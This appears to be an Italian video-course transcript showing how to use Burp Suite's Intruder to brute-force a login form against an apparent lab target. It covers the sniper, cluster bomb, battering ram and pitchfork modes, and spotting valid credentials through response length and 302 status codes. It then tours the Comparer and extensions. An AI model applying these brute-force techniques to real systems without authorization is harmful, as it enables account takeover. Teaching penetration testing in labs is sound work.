adesso, se noi gli diamo start attack, facciamo OK. Vedete che lui sta cominciando a fare l'attacco. Se tu clicchi per esempio qui, questi eh, sono i dati che sta eh, tramitando per post. Vedi? Qui ha inserito QWERTY. Se clicchiamo su Dragon, qui ha inserito Dragon, nella posizione dove gli abbiamo detto noi. Pertanto in automatico lui ci sta inserendo tutte le password che gli abbiamo dato qui, sta facendo l'attacco per trovare la password corretta. Questo naturalmente non è il Bursuit Professional, quindi è molto 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 lento. Tant'è che se vedete qui sotto guardate come stiamo andando lenti, 88, 89, 90. Se fosse stato il Bursuit Professional faceva più cose in parallelo, probabilmente avremmo già finito tutto quanto il dizionario. Quindi per questo spesso e volentieri è meglio andare a utilizzare uno script di Python che è molto più veloce. Proprio perché lo andremo a utilizzare e nei prossimi video già dal prossimo cominceremo la fase di esplotazione e faremo svariati script di Python, vi ricordo che abbiamo già cominciato sempre sul canale, sempre gratis, un corso di Python Offensive. È un corso che parte da zero, spiega le basi di Python, i concetti basilari che ci servono e poi switcha sul python offensive quindi andiamo a toccare argomenti prettamente per utilizzare python eh, facendo hacking un'altra cosa importante da tenere in conto guardate qui sotto ci sta encodeando alcuni caratteri questo non è buono se stiamo facendo un attacco con password perché se mi va a incodeare a eh, codificare, url codificare questi caratteri vuol dire che non li tramita come dovrebbe soprattutto per eh, le password che appunto utilizzano dei caratteri speciali pertanto questo lo andiamo a togliere adesso andiamocene un attimino in option setting da qui e come abbiamo già visto altre volte ce ne andiamo su grep extract questa è una cosa importante facciamo un add gli diamo fitch response in modo tale che possiamo far tramitare la, response, la risposta che ci sta dando in pratica questa è questa richiesta che stiamo facendo questa è la risposta comunque qui non è che vediamo chissà che la cosa che vediamo che ci interessa è questa ossia invalid password punto esclamativo questo ce l'andiamo a copiare gli diamo ok e vedete che ci ha creato un'espressione regolare su quella invalid password che abbiamo selezionato quindi adesso se noi torniamo alla nostra pagina di payload e gli diamo start attack, gli diamo ok, e lui ricomincia, questa volta vedete che ci dà una risposta, ci dà invalid password. Che significa questo? Significa che se abbiamo una risposta che sia differente da invalid password vuol dire che abbiamo trovato la password. Questo lo si può vedere anche sotto length, sotto la grandezza, perché come vediamo ogni risposta di invalid password ha una lunghezza, ossia 1661. Pertanto se abbiamo una risposta con una lunghezza differente vuol dire che non è invalid password e vuol dire che la password è corretta. Quindi possiamo cliccare qui per fare un ordinamento di invalid password, quindi per la, risp la risposta oppure per la lunghezza. Ora noi sappiamo che la password per l'username admin, la password è admin, ora siamo a 67 su 10.000, non so eh, a che posizione si trova la parola admin, però diciamo ecco quando la trova con questo sistema troveremo una eh, lang differente e qui non troveremo più la risposta invalid password. E questo che abbiamo visto ragazzi è un attacco di eh, tipo sniper. Questo lo andiamo a chiudere. Questo anche. Ce ne torniamo a intruder e andiamo a vedere un altro tipo di attacco. Abbiamo visto prima che con l'attacco sniper abbiamo solamente un campo. Pertanto se io adesso oltre alla password voglio andare a mettere un secondo campo, quindi l'username, faccio add. E seleziono sia il campo dell'username che il campo della password. Devo fare un altro tipo di attacco. Perché se adesso io vado ad utilizzare l'attacco sniper, facciamolo. Vedrete che lui mi prende in considerazione solamente il primo campo e il payload che abbiamo messo, sia le password. Se selezioniamo due campi, lui prende in considerazione il primo e comincia a inserire quelle password su admin, facciamo start attack. E vedete? Lo sta mettendo, sta eh, cambiando, inserendo le password nel primo campo, non più nel campo della password, ma abbiamo selezionato due campi, prendo in considerazione il primo che è quello dell'username, no? Ok. Ma in questa situazione è naturale che io voglio avere un eh, dizionario per quanto riguarda gli username e un dizionario per quanto riguarda le password. Allora, a questo punto io vado a cambiare il tipo di attacco. Vado a prendermi per esempio Cluster Bump e se vado su Payload, Payload Set, vedete nel menu a tendina qui abbiamo due campi da selezionare ed è quello che ci interessa a noi. Naturalmente, però, dobbiamo andare anche a pulire il campo 1 perché guardate, campo 2 Payload non c'è nulla, campo 1 Payload. Ci sono le password che abbiamo messo prima. Facciamo un clear, leviamo perché il campo 1 adesso è diventato il campo dell'username. Pertanto, nel campo 2 che adesso è diventato eh, password, gli andiamo a dare quello che gli abbiamo dato prima, ossia la lista delle password, delle 10.000 password che erano queste qui. Ma nel campo 1 no, perché il campo 1 è il campo dell'username. Pertanto, qui facciamo load, torniamo su andiamo su username e andiamoci a selezionare top username shortlist facciamo open e lui ci carica il nostro payload quindi ricapitolando abbiamo due campi il primo campo e il secondo campo stiamo facendo un attacco cluster bomb quindi ci dà due campi il primo campo username il secondo è password nel primo campo abbiamo messo una lista come vedete di username nel secondo campo abbiamo messo un payload con una lista di password. Poi ce ne andiamo su Setting come facciamo sempre e ce ne andiamo su grep Extract. Vi ricordate che qui abbiamo sempre la risposta invalid password, questa la possiamo lasciare perfetta così. Adesso gli andiamo a dare Start Attack e guardate un po' che cosa sta succedendo. Guardate che per ogni user che trova nella lista sta provando la prima password. Vedete? Dopodiché passa alla seconda, poi alla terza. In pratica, con questo tipo di attacco, lui prende un user, prova tutte le password, poi passa al secondo user, prova tutte le password. Quando ha finito tutti gli user, ricomincia da capo con gli user e passa alla seconda password. La prova con tutti gli user. Dopodiché ricomincia dall'user numero 1 e va con la terza password e via dicendo. E questo è il Cluster Bump, quindi quando volete combinare, volete unire due dizionari, un dizionario user e un dizionario password, potete utilizzare l'attacco Cluster Bump. Ok, questo lo possiamo fermare e adesso ci andiamo a vedere un altro tipo di attacco. Andiamoci a vedere il Battering RAM. Se ce ne andiamo come al solito su Payload, attenzione perché questo tipo di attacco anche questo ci contempla A un solo payload, non abbiamo due payload. E se noi gli diamo start attack, vedete cosa fa eh, il batter in RAM. In pratica ci sta mettendo la stessa linea in entrambi i campi, guardate. Username mysql, password mysql. Username user, password user. Username ansible, password ansible. In pratica ci piazza la stessa eh, parola tutti e due i campi in questo caso sta utilizzando il dizionario di username infatti vedete che qui dove ha utilizzato la parola admin per entrambi i campi ossia username e password guardate un po' è cambiato il lang e non abbiamo più la scritta invalid password quindi questo ci sta a significare che sono delle credenziali corrette infatti non lo sappiamo admin admin sono corrette lo possiamo vedere anche nella risposta, per esempio prendiamoci una prova, una petizione dove non è andata a buon fine che è un invalid password, andiamo su risposta e vedete che qui abbiamo come risposta su tutte queste petizioni un 200k. Ma se noi andiamo sulla petizione che è corretta, con le credenziali valide, guardate che è cambiata, 302 found. Ok, qui chiudiamo e torniamo a... Il nostro position e questa volta andiamoci a vedere l'ultimo tipo di attacco che è il pitchfork. Come funziona il pitchfork? Beh, il pitchfork anche lui ha eh, due payload, vedete, quindi va a lavorare in due campi. Però lui ci va a mettere: abbiamo messo due dizionari, la prima parola del dizionario user la mette insieme alla prima parola del dizionario password, dopodiché cambia seconda parola del dizionario user in parallelo alla seconda parola del dizionario password facciamo uno start attack e vediamo ecco qua, vedete? prima parola del dizionario user con la prima password seconda con la seconda terza con la terza quarta con la quarta questo è quello che fa il pitchfork se volete fate doppio clic su una linea <coughs> E potete andare a aprire altre finestre oppure potete andare a cambiare i colori. Vedete se magari avete qualcosa che vi interessa, potete metterlo in un colore eh, differente, ora, allora, queste li chiudiamo. E questo è, diciamo, a livello basico quello che è l'intruder. Perché lo andremo a utilizzare moltissimo. Certo, ci sono eh, molte altre opzioni, ma diciamo queste sono le più basilari, le più comuni, le più utilizzate. Andiamo a vedere altre cosine, proseguiamo oltre all'intruder abbiamo il sequencer il sequencer lo andremo a vedere un pochino più avanti perché eh, sicuramente lo utilizzeremo però abbiamo anche il comparer torniamocene per esempio a proxy history no e ci andiamo a scegliere uh, vediamo una che cambia uh, vediamo un po get per esempio prendiamoci questa e facciamo send to comparer, ma mandiamo la sollecitudine, la richiesta, non mandiamo il response. E prendiamo quest'altra e facciamo uguale, send to comparer. E se ce ne andiamo al comparer, come vedete abbiamo due schermate, select item 1, select item 2. E abbiamo queste due petizioni. Tu in comparer puoi fare una comparativa, una comparazione tra queste due petizioni. Lo puoi fare per bytes, lo puoi fare per words. Per esempio, clicchiamo su word. Vedete che lui ci sta mettendo le due petizioni, e le sta comparando. Ora, siccome queste due petizioni sono completamente identiche, non c'è alcun segno che ci fa vedere qualcosa, ma nel caso in cui ci fosse. Tra le due petizioni una cosa modificata, una cosa che non c'è più, o una cosa aggiunta sarebbe evidenziata con questi tre colori che vedete qua sotto. Magari questo eh, cambia, non so, ehm, qui la pagina, da login sarebbe eh, stata evidenziata come lo è adesso. Però con uno di questi tre colori sarà modificata. Ok. Diciamo che è un metodo si può vedere anche in esadecimale, però. Potete scegliere esame decimale o testo è un metodo per comparare due petizioni e vedere le differenze tra le due, ve le evidenzi al volo e vedete subito quali sono le differenze. Che altro abbiamo? Abbiamo il logger. Eh, logger non so se voi ce l'avete perché mi sa che è un, una cosa che ho aggiunto io. Se andate in extension, qui potete andare a cercare delle estensioni o quello che sia, App Store e qui ci sono tutte quante le varie estensioni che potete mettere ora man mano che eh, prenderete la mano con e eh, lo personalizzerete come meglio credete e qui ripeto potete trovare un sacco di estensioni che potrebbero essere interessanti per quello che dovete fare alcune però naturalmente state attenti perché richiedono il Bursuit Professional altri no un'estensione che per esempio è molto utile tra l'altro per noi che adesso abbiamo cominciato il python offensive vediamo se me la ricordo era copy as python eccola qua copy as python request per esempio adesso questa facciamo installa e ce ne torniamo eh, alla nostra petizione che era su intruder e prendiamo questa facciamo la selezioniamo e facciamo extension copy as Python request, copy as request e ce ne andiamo in una console e con nvm, ci apriamo un file tipo esempio, esempio 2.py e facciamo control v, come vedete mi ha copiato già una struttura in Python con la richiesta, questo è molto comodo, pertanto è una cosa comoda questa perché ti automatizza questa questa struttura che ti vai a copiare in Python e può risultare molto utile in tante cose che andremo a fare nella fase di esplotazione. Ok? Pertanto eh, abbiamo un sacco di cose che potete andare a scaricare, potete andare a eh, vedere, vi possono essere molto utili per scaricare eh, app, quello che vi interessa una volta che avete preso un po' la mano. E cercate delle estensioni per suite naturalmente come vi ho detto non tutte sono gratuite quindi andate a vedere bene che non hanno la casina la, la casella detail con scritto um, request suite vedete qui dove c'è request Bursuit require suite queste, queste tutte queste applicazioni vogliono il suite professional ok che altro possiamo andare a vedere uh, in Settings questo lo chiudiamo. Eh, possiamo andare a vederci eh, User Interface Display. Ok, questo me l'avete chiesto in tanti: come si fa ad avere Bull Suite in scuro? Perché naturalmente a noi ci piace lo scuro, visto che stiamo ore davanti al computer, sennò sanguinano gli occhi comunque qui da da option settings andate su eh, user interface display e qui potete selezionare se light che è questo che ti uccide o dark e qui potete aumentare un po il font size ok ragazzi detto questo io credo che siamo già pronti abbastanza per andarci ad addentrare finalmente nella fase di esplotazione Pertanto dal prossimo video, che sarà il primo della fase di esplotazione, andremo a vedere nel dettaglio da zero per bene tutto SQL in action. Ci vediamo al prossimo video.